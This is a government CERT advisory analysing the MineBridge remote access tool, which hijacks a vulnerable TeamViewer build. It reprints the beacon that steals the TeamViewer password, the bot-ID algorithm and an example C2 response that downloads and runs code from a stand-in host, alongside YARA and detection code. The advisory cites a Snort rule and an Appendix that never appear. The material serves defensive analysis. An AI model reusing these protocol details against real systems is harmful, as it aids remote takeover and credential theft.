ADVISORY MINEBRIDGE MALWARE INTEGRATED WITH TEAMVIEWER APP
aeCERT, one of the Telecommunications Regulatory Authority (TRA) initiatives
P.O. Box 116688, Dubai, United Arab Emirates (UAE)
www.aecert.ae | www.tra.gov.ae
Version: 1.0
Ref: ADV-19-028
Document Date: 07/04/2020
Document Details

Disclaimer
Whilst every effort has been made to ensure the accuracy of the information contained within this report, aeCERT and the TRA bear no liability or responsibility for any recommendations issued or inadvertent damages that could be caused by the recipient of this information. Accessing third-party links in this advisory will direct you to an external website. Please note that aeCERT bears no responsibility for third-party website traffic. aeCERT will have no liability to the entities for the content or use of the content available through the hyperlinks that are referenced.

Contents
Summary
Details
  MineBridge Installation
  MineBridge Main Code
  MineBridge and TVSpy Code Similarities
Tactics, Techniques, and Procedures
Host Indicators of Attack
Recommendations
References
Summary

As the leading trusted secure cyber coordination center in the region, aeCERT has researched a remote access tool dubbed MineBridge. It is a C++ remote access tool that is integrated with the TeamViewer app. It uses a vulnerable version of TeamViewer to load a malicious DLL. MineBridge can communicate with a designated C2 server to receive further commands to execute. The network communication with the C2 is not encrypted. MineBridge is able to collect basic system information, download and run additional files received from the C2 server, and reboot or shut down the system.

Details

MineBridge malware is deployed as a DLL that contains a conspicuous number of exported functions. Most of the exported functions have the prefix "msi", the prefix used for the Microsoft Installer (MSI) service application programming interface names. Among the exported functions, only two have meaningful code:
• DllRegisterServer: function to install the malware.
• DllMain: function to run the main code.

MineBridge Installation

The DllRegisterServer exported function is invoked using the regsvr32.exe program. Once invoked, DllRegisterServer verifies that the name of the executable is regsvr32.exe or rundll32.exe. If this is not the case, MineBridge terminates the process. Otherwise, the malware downloads a zipped file from a hard-coded URL and saves the content under the hard-coded filename %TEMP%\~f75f3yu4fbhbgd.bin. The file is uncompressed into the folder %AppData%\Windows Media Player using an open-source library. During uncompression, MineBridge checks whether the name of the uncompressed file is TeamViewer.exe; if so, the file is renamed to wpvnetwks.exe. When the process is completed, MineBridge deletes the temporary zipped file and copies the executing MineBridge binary to %AppData%\Windows Media Player\msi.dll. The function terminates by creating a new thread that ensures persistence on the system.

To ensure persistence, MineBridge creates a shell link in the startup folder that points to the malware binary. The malicious link is executed each time the system is started. This task is achieved by creating an instance of a Component Object Model (COM) object with:
• Class ID (CLSID): CLSID_ShellLink (00021401-0000-0000-c000-000000000046).
• Interface ID (IID): IID_IShellLinkW (000214f9-0000-0000-c000-000000000046).

The created object is an IShellLinkW that is used to create the shell link with the properties described in Table 1:

Name | Value | Description
Path | The currently executing binary file, which is (after installation) the TeamViewer executable, wpvnetwks.exe | The path of the program that must be executed on startup
Description | Windows WMI | The description of the shell link object
Icon location | WMIC.exe | The location (path and index) of the icon to use for the link file
Table 1

After the shell link object is configured, MineBridge queries the COM object to obtain an instance of the IPersistFile interface. This is done by invoking the QueryInterface function and specifying:
• IID: IID_IPersistFile (0000010b-0000-0000-c000-000000000046).

This new object is used to persist the link in the startup folder, whose location is obtained by using the CSIDL_STARTUP value (0x7). The name of the created link file is Windows WMI.lnk.

MineBridge Main Code

In order to run the main MineBridge code, the TeamViewer.exe file must be executed. All the files uncompressed during the installation step are legitimate TeamViewer files belonging to version 11.0.133222. This version was chosen because it contains a rather critical DLL side-loading vulnerability, which MineBridge exploits to load its malicious DLL. The execution of the malicious MineBridge DLL is achieved through the TeamViewer binary's dependency on the legitimate msi.dll file: because of the side-loading vulnerability, this version of TeamViewer can be made to load an arbitrary file named msi.dll instead.
Initialization

The malware verifies that the name of the executing file is not regsvr32.exe or rundll32.exe, which ensures that the code of the DllMain function is not executed when the DLL is loaded as part of the installation process. The initialization code proceeds to parse the command-line arguments and checks whether the COM1_ argument is specified; if so, MineBridge sleeps for five seconds.

The next step is to fix up the exported MSI function addresses: MineBridge loads the legitimate msi.dll and resolves the addresses of all the functions exported by the malicious DLL, so that TeamViewer continues to work properly. MineBridge then ensures that the TeamViewer execution does not show any window on the screen or perform actions that could alert the user to its execution. It does so by resolving the addresses of the functions that might display content on the screen and applying inline hooks to them using the open-source project "mhook". The hooked functions are listed below:
• MessageBoxA
• MessageBoxW
• SetWindowTextW
• IsWindowVisible
• DialogBoxParamW
• ShowWindow
• RegisterClassExW
• CreateDialogParamW
• Shell_NotifyIconW
• GetAdapterInfo
• RegCreateKeyExW
• SetCurrentDirectoryW
• CreateMutexW
• CreateMutexA
• CreateFileW

The usage of the mhook library leads to the disclosure of the full path used to develop the malware. This is due to the usage of assert inside the mhook code. When assert is used, it instructs the compiler to insert a call to the function _wassert, passing as parameters the string of the condition to check as well as the full name and line number of the file that uses assert. This results in the disclosure of the following path:

    c:\users\maximys\desktop\eric_guft@jabbeer.com\mhook_lib\mhook_lib\disasmlib\disasm.c

MineBridge computes a bot ID, which takes the format of a Globally Unique Identifier (GUID). The computation is done using a Linear Congruential Generator (LCG) whose seed is the hard disk volume serial number. The Python code below computes the MineBridge bot ID for a given volume serial number:

    # Bot ID generation: an LCG seeded with the hard disk volume serial number.
    # All intermediate values are truncated to 32 or 16 bits as the binary does.
    volume_serial_number = 0x86949be0
    tmp = (6125472 * volume_serial_number) & 0xFFFFFFFF
    chunk1 = (tmp + 1266423) & 0xFFFFFFFF
    tmp = (30624 * chunk1) & 0xFFFF
    chunk2 = ((tmp + 21239) & 0xFFFF) // 5   # integer division (the code was written for Python 2)
    tmp = (9216 * chunk1) & 0xFFFF
    chunk3 = (tmp - 425) & 0xFFFF
    chunk4 = (chunk1 * 87) & 0xFFFFFFFF
    bot_id = "%06lX-%04lX-%04lX-%06lX" % (chunk1, chunk2, chunk3, chunk4)
    print('Bot ID: ' + bot_id)

When the initialization step is completed, MineBridge starts two threads:
• The first thread records the last time that the window received user input.
• The second thread runs the main code that interacts with the C2 server.

C2 Communication

MineBridge collects information from the TeamViewer program before communicating with the C2 server. MineBridge enters a loop in which it sleeps for two seconds between iterations, to ensure that all information is collected before proceeding. Table 2 shows the information collected in the SetWindowTextW hook function:
Name | Description
User ID | MineBridge collects the TeamViewer-generated user ID by inspecting the title parameter of the SetWindowTextW function. In order to identify the user ID, MineBridge verifies the length of the value with two checks: (1) if the length is 13, the characters at positions 1, 5, and 9 (counting from 0) must be spaces; (2) if the length is 11, the characters at positions 3 and 7 (counting from 0) must be spaces. These checks are performed because TeamViewer uses a specific format to represent the user ID string (a space character is added after every three characters). When the user ID is identified, MineBridge removes the spaces and saves the value in a global variable that is used later in the communication with the C2 server.
Connection Password | MineBridge collects the TeamViewer-generated password by inspecting the title parameter of the SetWindowTextW function. MineBridge verifies that the length of the value is 6 and, if that check is satisfied, that the character at position 1 (counting from 0) is not "-". This check is necessary because in one specific case the SetWindowTextW function is called with the parameter value E-mail, which would otherwise generate a false positive due to its length.
Table 2

After the TeamViewer information is collected, a new thread is started that connects to the C2 server. MineBridge proceeds to fingerprint the system to obtain the following information:
• Operating system (OS) version and installed service pack
• Username
• Computer name

This information is formatted and concatenated with:
• Bot ID
• TeamViewer user ID
• TeamViewer password
Each field is separated by an ampersand (&) character, as shown below:

    uuid=D1C9DEF7-1944-BA574B9AC5F1&id=.1556171343&pass=958uiq&username=User&pcname=WINEO0PUMJ8E6G&osver=Windows 7 SP 1&timeout=70

Table 3 describes each query parameter:

Name | Description
uuid | The generated bot ID
id | The TeamViewer user ID
pass | The TeamViewer password
username | The victim username
pcname | The victim computer name
osver | The OS version and installed service pack
timeout | A hard-coded value used by MineBridge to sleep before sending a request to the C2 server. It is expressed in milliseconds
Table 3

MineBridge sends the data using an HTTP POST request to the C2 server. The request uses the following hard-coded user agent string:

    Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1

The server response contains the command that must be executed. MineBridge expects a response that starts either with the d character or with 0x00000000. In the second case, the value means that there is no task to execute, so MineBridge sleeps for the specified timeout before trying to contact the C2 server again. In the first case, a command name is expected. The response value is split twice:
• First by the ampersand (&) character.
• Then by the equal sign (=) character.

The server response has the following format:

    drun_command=[0,1]&drun_URL=[value]&rundll_command=[0,1]&rundll_URL=[value]&update_command=[0,1]&update_URL=[value]&restart_command=[0,1]&terminate_command=[0,1]&kill_command=[0,1]&poweroff_command=[0,1]&reboot_command=[0,1]&setinterval_command=[0,1]&setinterval_time=[value]
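The beacon format above can be checked in code. The following Python is an added example for this advisory, not code from aeCERT or from the CrowdStrike report it draws on. It splits a POST body into the seven fields of Table 3, applies a content-based check (bot ID shape derived from the "%06lX-%04lX-%04lX-%06lX" format string given earlier, six-character password, numeric timeout), and then emulates the offset/depth content matches of the Snort rule listed later under Network Artifacts, to show which bodies that rule would catch. Both sample bodies are constructed, not captured traffic.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed sample POST bodies (not captured traffic). Field order and
# separators follow the advisory: uuid, id, pass, username, pcname, osver,
# timeout, joined by '&'. The first body carries a 27-character bot ID
# (8-4-4-8 hex digits); the second carries the shortest bot ID the
# "%06lX-%04lX-%04lX-%06lX" format can emit (6-4-4-6, 23 characters).
BEACON_LONG_ID = (
    "uuid=A1B2C3D4-1234-ABCD-0F1E2D3C&id=.1556171343&pass=958uiq"
    "&username=User&pcname=WINEO0PUMJ8E6G&osver=Windows 7 SP 1&timeout=70"
)
BEACON_SHORT_ID = (
    "uuid=A1B2C3-1234-ABCD-0F1E2D&id=.1556171343&pass=958uiq"
    "&username=User&pcname=WINEO0PUMJ8E6G&osver=Windows 7 SP 1&timeout=70"
)

BEACON_FIELDS = ("uuid", "id", "pass", "username", "pcname", "osver", "timeout")

# Shape of a bot ID as implied by the advisory's format string: the 32-bit
# chunks print as 6 to 8 upper-case hex digits, the 16-bit chunks as 4.
BOT_ID_RE = re.compile(r"^[0-9A-F]{6,8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{6,8}$")


def parse_beacon(body: str) -> Optional[Dict[str, str]]:
    """Split on '&' then '='; None unless exactly the expected keys appear, in order."""
    fields: Dict[str, str] = {}
    for part in body.split("&"):
        key, sep, value = part.partition("=")
        if not sep:
            return None
        fields[key] = value
    if tuple(fields) != BEACON_FIELDS:
        return None
    return fields


def looks_like_minebridge_beacon(body: str) -> bool:
    """Content-based check that does not depend on byte offsets."""
    fields = parse_beacon(body)
    if fields is None:
        return False
    return (
        BOT_ID_RE.match(fields["uuid"]) is not None
        and len(fields["pass"]) == 6          # password length the malware itself checks for
        and fields["timeout"].isdigit()
    )


# (content, offset, depth) triples transcribed from the Snort rule (sid 8001604)
# in this advisory. depth=None stands for a content match with offset but no depth.
SNORT_CONTENTS: Tuple[Tuple[str, int, Optional[int]], ...] = (
    ("uuid=", 0, 5),
    ("&id=", 32, 4),
    ("&pass=", 47, 6),
    ("&username=", 59, 10),
    ("&pcname=", 70, None),
    ("&osver=", 79, None),
    ("&timeout=", 87, None),
)


def snort_content_match(body: str, content: str, offset: int, depth: Optional[int]) -> bool:
    """Emulate Snort 'content' with offset/depth/nocase: the pattern must lie inside the window."""
    window = body[offset:] if depth is None else body[offset:offset + depth]
    return content.lower() in window.lower()


def snort_rule_fires(body: str) -> bool:
    """True when every content match of the rule succeeds on this HTTP body."""
    return all(snort_content_match(body, c, o, d) for c, o, d in SNORT_CONTENTS)


if __name__ == "__main__":
    for label, body in (("27-char bot ID", BEACON_LONG_ID), ("23-char bot ID", BEACON_SHORT_ID)):
        print(label, "content check:", looks_like_minebridge_beacon(body),
              "snort rule:", snort_rule_fires(body))
```

The second body passes the content-based check but not the emulated rule: its bot ID is 23 characters, so "&id=" falls at byte 28 rather than the byte 32 the rule demands. The rule's fixed offsets likewise assume an 11-character TeamViewer ID and a 6-character password, so any bot ID whose 32-bit chunks print with fewer than eight hex digits shifts every later field and the rule does not fire; a field-based check such as looks_like_minebridge_beacon is the natural complement.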
Therefore, an example response can be the following:

    drun_command=0&drun_URL=http://bad[.]com/file.exe&rundll_command=0&rundll_URL=http://bad[.]com/file.dll&update_command=1&update_URL=http://bad[.]com/update.exe&restart_command=0&terminate_command=0&kill_command=0&poweroff_command=0&reboot_command=0&setinterval_command=1&setinterval_time=1

MineBridge Commands

MineBridge periodically contacts the C2 server for new commands to execute. When a response from the C2 server is received, it expects the data to contain the keys listed in Table 5. If the keys are not contained in the data, the data is considered invalid and the next C2 server on the list is contacted. Every command is described by at least one parameter that tells the client whether or not the command must be executed. If a command requires additional data, MineBridge reads the command's value from a separate parameter whose name depends on the specific command. The command string below provides information on the drun_command command:

    drun_command=1&drun_URL=some value

The string is parsed in order to extract two values:
• A flag indicating whether the command must be executed (a value of 1 means that the command must be executed).
• A value (in this case, the string some value).

Once execution is complete, MineBridge sends a request to the C2 server to report the result of the command. All HTTP requests sent from the client to the C2 server carry the bot ID in a parameter named uuid. Table 4 describes the currently supported MineBridge commands and the name of the value parameter required by each command:
drun_command (value parameter: drun_URL)
MineBridge performs the following actions:
• It creates a file with a random name in the %TEMP% directory. The name has the pattern [0-9a-zA-Z]{31}.exe.
• It downloads the file specified in the drun_URL parameter and saves the content in the temporary file.
• If the downloaded binary is a valid 32-bit Portable Executable (PE), the file is executed by calling the CreateProcessW function; otherwise, the file is deleted.
After completing the tasks above, MineBridge sends a request to the C2 server that includes the bot ID and the parameter drun_status, set to 1 if the task succeeds and 2 otherwise.

rundll_command (value parameter: rundll_URL)
MineBridge performs the following actions:
• It creates a file with a random name in the %TEMP% directory. The name has the pattern [0-9a-zA-Z]{31}.
• It downloads the file specified in the rundll_URL parameter and saves the content in the created temporary file.
• It decrypts the file with an XOR algorithm that uses the key kernel32.dll. In the Appendix, Python code is provided to decrypt the downloaded file.
• The resulting buffer is uncompressed by invoking RtlDecompressBuffer.
• If the resulting uncompressed buffer is a valid PE file, a new thread maps the PE content in memory and runs it.
After completing the tasks above, MineBridge sends a request to the C2 server that includes the bot ID and the parameter rundll_status, set to 1 if the task succeeds, to 2 if the PE is not correctly executed, or to 3 if the file was not downloaded at all.

update_command (value parameter: update_URL)
MineBridge performs the following actions:
• It copies the MineBridge module (msi.dll) to msi.dll.old.
• It downloads the file specified in the update_URL parameter and saves the content under the module filename, msi.dll.
• It deletes the msi.dll.old file.
• It creates a new thread that sleeps for seven seconds and then terminates the process. The sleep gives the update process enough time to complete.
• It creates a new process, providing as the filename the currently executing binary, wpvnetwks.exe (this results in a new instance of the vulnerable TeamViewer binary). The parameter COM1_ is also specified to make the newly created process sleep for five seconds, so that the update has enough time to complete.
After completing the tasks above, MineBridge sends a request to the C2 server that includes the bot ID and the parameter update_status, set to 1 if the task succeeds and 2 otherwise.

restart_command (no value parameter)
MineBridge performs the following actions:
• It creates a new thread that sleeps for seven seconds and then terminates the process.
• It sends a request to the C2 server that includes the bot ID and the parameter restart_status set to 1.
• It creates a new process, providing as the filename the currently executing binary, wpvnetwks.exe (this results in a new instance of the vulnerable TeamViewer binary). The parameter COM1_ is also specified to make the newly created process sleep for five seconds.

terminate_command (no value parameter)
This command sends a request to the C2 server that includes the bot ID and the parameter terminate_status set to 1. After the request is sent, MineBridge sends a window message to the TeamViewer host application to terminate the process, using the SendMessageW function.

kill_command (no value parameter)
This command sends a request to the C2 server that includes the bot ID and the parameter kill_status set to 1. After the request is sent, MineBridge creates and executes a batch file named tvdell.cmd in the current working directory. The file's content is created dynamically from strings hard-coded in the MineBridge binary. The batch file, whose content is provided in the Appendix, deletes all MineBridge files. After the batch file is executed, the process is terminated.

poweroff_command (no value parameter)
This command sends a request to the C2 server that includes the bot ID and the parameter poweroff_status set to 1. After the request is sent, MineBridge calls the ZwShutdownSystem function with the input value 2, which shuts down the system.

reboot_command (no value parameter)
This command sends a request to the C2 server that includes the bot ID and the parameter reboot_status set to 1. After the request is sent, MineBridge calls the ZwShutdownSystem function with the input value 1, which reboots the system.

setinterval_command (value parameter: setinterval_time)
This command sends a request to the C2 server that includes the bot ID and the parameter setinterval_status set to 1. After the request is sent, MineBridge parses the setinterval_time parameter value and updates a global variable containing the timeout to sleep between requests.
Table 4
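The task exchange described in this section can be decoded in both directions. The Python below is an added example, not part of this advisory or of the CrowdStrike report it draws on: the server's key=value response is parsed into the keys of Table 4 and reduced to the list of enabled commands with their values, and the client's follow-up report (the "uuid=%s&<name>_status=" strings the YARA rule later in this advisory lists) is decoded back to a bot ID, command and status code. The sample response is constructed after the example response above. Treating the XOR step of rundll_command as a repeating-key XOR is an assumption made here, since the advisory names the key but not how it is applied.

```python
from typing import Dict, List, Optional, Tuple

# Every key the advisory lists in the server response format. The client
# treats a response lacking any of them as invalid and moves to the next C2.
TASK_KEYS = (
    "drun_command", "drun_URL",
    "rundll_command", "rundll_URL",
    "update_command", "update_URL",
    "restart_command", "terminate_command", "kill_command",
    "poweroff_command", "reboot_command",
    "setinterval_command", "setinterval_time",
)

# Commands that carry extra data, mapped to the key holding that data.
VALUE_KEY_FOR = {
    "drun_command": "drun_URL",
    "rundll_command": "rundll_URL",
    "update_command": "update_URL",
    "setinterval_command": "setinterval_time",
}

# Constructed sample modelled on the advisory's example response (defanged
# URLs as in the advisory; this is not captured traffic).
SAMPLE_RESPONSE = (
    "drun_command=0&drun_URL=http://bad[.]com/file.exe"
    "&rundll_command=0&rundll_URL=http://bad[.]com/file.dll"
    "&update_command=1&update_URL=http://bad[.]com/update.exe"
    "&restart_command=0&terminate_command=0&kill_command=0"
    "&poweroff_command=0&reboot_command=0"
    "&setinterval_command=1&setinterval_time=1"
)


def parse_task_response(body: str) -> Optional[Dict[str, str]]:
    """Split on '&' then '=' as the advisory describes.

    Returns None for a 'no task' response (the advisory says it starts with
    0x00000000 rather than the d character) and for responses missing a key.
    """
    if not body.startswith("d"):
        return None
    fields: Dict[str, str] = {}
    for part in body.split("&"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key] = value
    if any(k not in fields for k in TASK_KEYS):
        return None
    return fields


def enabled_commands(fields: Dict[str, str]) -> List[Tuple[str, Optional[str]]]:
    """(command, value) for every command whose flag is '1'; value is None for flag-only commands."""
    out: List[Tuple[str, Optional[str]]] = []
    for key in TASK_KEYS:
        if key.endswith("_command") and fields[key] == "1":
            value_key = VALUE_KEY_FOR.get(key)
            out.append((key, fields[value_key] if value_key else None))
    return out


def parse_status_report(body: str) -> Optional[Tuple[str, str, int]]:
    """Decode a client report such as 'uuid=<bot id>&update_status=1' into (bot_id, command, status)."""
    parts = body.split("&")
    if len(parts) != 2 or not parts[0].startswith("uuid="):
        return None
    key, sep, value = parts[1].partition("=")
    if not sep or not key.endswith("_status") or not value.isdigit():
        return None
    return parts[0][len("uuid="):], key[: -len("_status")] + "_command", int(value)


RUNDLL_XOR_KEY = b"kernel32.dll"


def xor_with_key(data: bytes, key: bytes = RUNDLL_XOR_KEY) -> bytes:
    """Repeating-key XOR (assumption: cyclic application of the key named in the advisory).

    The operation is its own inverse. Per the advisory the output is still
    compressed (RtlDecompressBuffer) and is not yet a PE image.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


if __name__ == "__main__":
    tasks = parse_task_response(SAMPLE_RESPONSE)
    print("enabled:", enabled_commands(tasks) if tasks else "no task")
    print("report:", parse_status_report("uuid=A1B2C3D4-1234-ABCD-0F1E2D3C&update_status=1"))
```

On the constructed response only update_command and setinterval_command are enabled, which is the combination a responder would want to see at a glance when reviewing captured C2 traffic: a self-update plus a shorter polling interval.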
MineBridge and TVSpy Code Similarities

• The MineBridge commands update_command and kill_command are executed from a function that compares the input data with a list of string values (described in Table 5) and, if a match is found, executes the related code. This function therefore acts as a command processor.
• No command in this list other than update_command and kill_command can be executed by MineBridge, because a string comparison filters the other commands out.
• Both MineBridge and TVSpy download the TeamViewer binary from a remote location and use a DLL side-loading vulnerability to load the malicious DLL.
• MineBridge contains dead code that uses the Windows messaging system to invoke the command processor function via the WindowProc callback, the function that handles messages sent to the window.
  o When the WindowProc function is invoked, the lParam value is split by newlines and each line is passed to the command processor function.
  o When the command execution is completed, a new message is sent by invoking the SendMessageW API function, specifying the custom value 0x7EA as the Msg parameter and the command name as the wParam parameter; the lParam parameter is used to return the result of the command.
  o Messages with a Msg value greater than 0x7E9 (as in the case above) are handled by a different code path inside the WindowProc function. In particular, the code obtains handles to specific window controls by invoking the GetDlgItem function and sends three messages with the values WM_SETFOCUS (0x7), WM_SETTEXT (0xC), and BM_CLICK (0xF5). This behavior is exactly the same as in the TVSpy RAT, where the command result is sent via the TeamViewer chat feature by emulating keystrokes and clicking the send button.

Despite having this unique command processor code, MineBridge does not use it. This is another indication that MineBridge may have been forked from the TVSpy RAT source code.
Table 5 describes the command names used for comparison. Some of the names are identical to those found in the TVSpy RAT. While all of the commands listed in Table 5 are implemented in MineBridge, their code paths are not reachable; they may therefore be artefacts from an older codebase or from the TVSpy RAT.

Name | Description | Present in TVSpy
update | This command contains a code path that is followed when the update_command command is received from the C2 server. | Yes
kill | This command contains a code path that is followed when the kill_command command is received from the C2 server. | No, but similar to delproc
control | This sends a message to TeamViewer to change its status to connected. | No
restart | This restarts the system by executing the same steps as the command reboot_command. | Yes
terminate | This command shuts down the system by executing the same steps as the command poweroff_command. | No
reboot | This shuts down the system by executing the same steps as the command reboot_command. | No
poweroff | This is an alias for the reboot command. | Yes
tasklist | This lists all running processes on the system. For each process, the name and the process ID are returned. | No, but similar to applist
admin | This command returns a value specifying whether the process is running with administrator privileges. | No
minwnd | This minimizes all TeamViewer windows. | No
time | This retrieves the local time. | Yes
locale | This command retrieves the keyboard layout. | Yes
idle | This retrieves the last time that a user input was received. This command reads from a global variable that is updated in a separate thread. | No
cmd | This command executes a program through the default command shell. The command shell path is obtained by resolving the environment variable %COMSPEC%. | No
wcmd | This command is the same as cmd, but the /C argument is passed to the command shell program. | Yes
fuac | This restarts the process by using the following command line: runas wmic process call create . This command executes the program with Administrator privileges; however, it is not a User Account Control (UAC) bypass, since the command execution shows the UAC window to the user. | No
mic | This enables or disables audio recording from the microphone of the infected computer. | No, but similar to startaudio and stopaudio
rundll | This command executes the same operation as the rundll_command task; the only notable difference is that an .xpdf extension is added to the temporary filename. | No, but similar to run
deldll | This command deletes a file whose path is received as input. Before deleting the file, the .xpdf extension is added to the file name. | No
Table 5
Tactics, Techniques, and Procedures

The following TTPs may be used to characterize the activity of MineBridge:
• Use of the vulnerable TeamViewer application version 11.0.133222
• MineBridge communicates with the C2 server through HTTP POST requests
• The communication with the C2 server is not encrypted
• MineBridge saves the downloaded TeamViewer binary and the malicious DLL in the %APPDATA%\Windows Media Player directory
• The files downloaded by MineBridge are temporarily saved in the %TEMP% directory using the pattern [0-9a-zA-Z]{31} for the filename
• Persistence is obtained by creating a link file in the startup folder
• MineBridge removes itself from the system by creating and running a batch file, which deletes all downloaded files

Host Indicators of Attack

The tables below detail files belonging to MineBridge campaigns, including filename, SHA256 hash, and build time when known.

Executables

Filename | SHA256 hash | Build time (UTC)
Msi.dll | 57671d5154e707da0ee6139485f45a50fa9221852ebb65781d45a2660da7d0cb | 2018-09-22 18:02:53
Msi.dll (unpacked) | 1d81da0d1b043bc48ccbff03c72007728ff09e219c204827cfe341719c27bcb7 | 2020-01-24 19:14:00
21d37af3705816386bb1b59934d695e6.virus | 86d1637975059d6b5cdef0564d764401c703a4629a6413c7b9b77d7487f7836f | 2010-08-01 10:32:37
(filename not given) | c9b4b614271e45bc6e41b5d7590cc6418a8f7281697508c983720a43723a75b2 | 2019-03-05 18:41:12
(filename not given) | 9d8619002a390f35a6b6e02c5275026f8872f8c1a45df2d28527341012e49016 | 2019-03-05 18:41:12
Table 6

Related Files

Filename | SHA256 hash
%TEMP%\~f75f3yu4fbhbgd.bin | 76a13e4caefbffc50c2c1ed3023e9041fd4c3f4cb1947262caf3e241b127503c
Table 7

File System

The presence of one or more of the following files may indicate a MineBridge infection:

File path | Description
Windows WMI.lnk | Link file used for system persistence
tvdell.cmd | Batch file to remove MineBridge files
Table 8
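The file indicators in Table 8 above, the path pattern in Table 9 below, the install directory and the staging archive lend themselves to a simple host triage script. The Python below is an added example, not tooling from aeCERT or CrowdStrike: scan_profile checks a profile's %APPDATA%, startup and %TEMP% locations for the names and the [0-9a-zA-Z]{31} pattern given in this advisory, and demo_indicators exercises it against a constructed directory tree of empty files so it runs offline. Looking for tvdell.cmd inside the Windows Media Player directory is an assumption made here (the advisory only says it is written to the current working directory); the per-user startup folder is the standard CSIDL_STARTUP location under %APPDATA%.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Host indicators taken from this advisory: install directory under %APPDATA%,
# startup link, staging archive and temporary download name pattern.
# tvdell.cmd is written to the process's current working directory; looking
# for it next to the other install files is an assumption made for this scan.
INSTALL_DIR = "Windows Media Player"
INSTALL_FILES = ("msi.dll", "msi.dll.old", "wpvnetwks.exe", "tvdell.cmd")
STARTUP_LNK = "Windows WMI.lnk"
STAGING_ARCHIVE = "~f75f3yu4fbhbgd.bin"
TEMP_DOWNLOAD_RE = re.compile(r"^[0-9a-zA-Z]{31}(\.exe)?$")   # rundll and drun temp names


def scan_profile(appdata: Path, startup: Path, temp: Path) -> List[Tuple[str, str]]:
    """Return (indicator, path) pairs for every MineBridge host indicator found."""
    findings: List[Tuple[str, str]] = []
    install = appdata / INSTALL_DIR
    for name in INSTALL_FILES:
        if (install / name).is_file():
            findings.append((f"install file {name}", str(install / name)))
    if (startup / STARTUP_LNK).is_file():
        findings.append(("startup link", str(startup / STARTUP_LNK)))
    if (temp / STAGING_ARCHIVE).is_file():
        findings.append(("staging archive", str(temp / STAGING_ARCHIVE)))
    if temp.is_dir():
        for entry in sorted(temp.iterdir()):
            if entry.is_file() and TEMP_DOWNLOAD_RE.match(entry.name):
                findings.append(("temp download pattern", str(entry)))
    return findings


def scan_current_user() -> List[Tuple[str, str]]:
    """Resolve the real profile locations of the current user (Windows) and scan them."""
    appdata = Path(os.environ.get("APPDATA", ""))
    # Per-user CSIDL_STARTUP folder, the location the advisory says the link is written to.
    startup = appdata / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"
    temp = Path(os.environ.get("TEMP", tempfile.gettempdir()))
    return scan_profile(appdata, startup, temp)


def build_constructed_profile(root: Path) -> Tuple[Path, Path, Path]:
    """Plant empty files with the indicator names (constructed and harmless) for an offline run."""
    appdata = root / "AppData" / "Roaming"
    startup = appdata / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"
    temp = root / "Temp"
    for d in (appdata / INSTALL_DIR, startup, temp):
        d.mkdir(parents=True, exist_ok=True)
    (appdata / INSTALL_DIR / "msi.dll").touch()
    (appdata / INSTALL_DIR / "wpvnetwks.exe").touch()
    (startup / STARTUP_LNK).touch()
    (temp / ("a" * 31 + ".exe")).touch()           # matches the download pattern
    (temp / ("b" * 30)).touch()                     # 30 characters: must not match
    (temp / ("c" * 15 + "-" + "d" * 15)).touch()    # 31 characters but not alphanumeric: must not match
    return appdata, startup, temp


def demo_indicators() -> List[str]:
    """Scan a constructed profile in a temporary directory and return the indicator labels found."""
    with tempfile.TemporaryDirectory() as d:
        appdata, startup, temp = build_constructed_profile(Path(d))
        return [label for label, _ in scan_profile(appdata, startup, temp)]


if __name__ == "__main__":
    print("constructed profile:", demo_indicators())
    for label, path in scan_current_user():
        print(label, "->", path)
```

The negative cases in the constructed tree matter as much as the positive ones: a 30-character name and a 31-character name containing a hyphen are both left out, so the pattern check does not flood a responder with unrelated temporary files.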
The presence of files with paths matching the following pattern(s) may indicate a MineBridge infection:

Pattern | Description
%TEMP%\[0-9a-zA-Z]{31} | Temporary downloaded files
Table 9

YARA Rules

    rule CrowdStrike_CSIT_20032_01 : ecrime graceful_spider minebridge rat unpacked
    {
        meta:
            copyright = "(c) 2020 CrowdStrike Inc."
            description = "Detects strings and opcodes present in MineBridge"
            reports = "CSIT-20032"
            version = "202003111132"
            last_modified = "2020-03-11"
            actor = "GRACEFUL SPIDER"
            malware_family = "MineBridge"
            author = "aparata"
            labels = "ecrime,graceful_spider,minebridge,rat,unpacked"

        strings:
            // server command names
            $cmd_name1 = "drun_command"
            $cmd_name2 = "drun_URL"
            $cmd_name3 = "rundll_command"
            $cmd_name4 = "rundll_URL"
            $cmd_name5 = "update_command"
            $cmd_name6 = "update_URL"
            $cmd_name7 = "restart_command"
            $cmd_name8 = "terminate_command"
            $cmd_name9 = "kill_command"
            $cmd_name10 = "poweroff_command"
            $cmd_name11 = "reboot_command"
            $cmd_name12 = "setinterval_command"
            $cmd_name13 = "setinterval_time"

            // client response
            $cmd_response1 = "uuid=%s&drun_status="
            $cmd_response2 = "uuid=%s&kill_status="
            $cmd_response3 = "uuid=%s&poweroff_status="
            $cmd_response4 = "uuid=%s&reboot_status="
            $cmd_response5 = "uuid=%s&restart_status="
            $cmd_response6 = "uuid=%s&rundll_status="
            $cmd_response7 = "uuid=%s&setinterval_status="
            $cmd_response8 = "uuid=%s&terminate_status="
            $cmd_response9 = "uuid=%s&update_status="
            $cmd_response10 = "uuid=%s&id=%s&pass=%s&username=%s&pcname=%s&osver=%s&timeout=%d"

            /*
                bot ID uuid generator part 1
                81 C6 F7 52 13 00      add  esi, 1352F7h
                69 C6 00 24 00 00      imul eax, esi, 2400h
                69 D6 A0 77 00 00      imul edx, esi, 77A0h
            */
            $bot_ID_gen_code1 = {81 C6 F7 52 13 00 69 C6 00 24 00 00 69 D6 A0 77 00 00}

            /*
                bot ID uuid generator part 2
                0F B7 C8               movzx ecx, ax
                69 C6 00 80 92 26      imul  eax, esi, 26928000h
                05 57 BA C7 01         add   eax, 1C7BA57h
            */
            $bot_ID_gen_code2 = {0F B7 C8 69 C6 00 80 92 26 05 57 BA C7 01}

        condition:
            uint16(0) == 0x5a4d and
            (
                (3 of ($cmd_name*)) or
                (any of ($cmd_response*)) or
                (any of ($bot_ID_gen_code*))
            )
    }

Network Artifacts

Infrastructure for MineBridge:

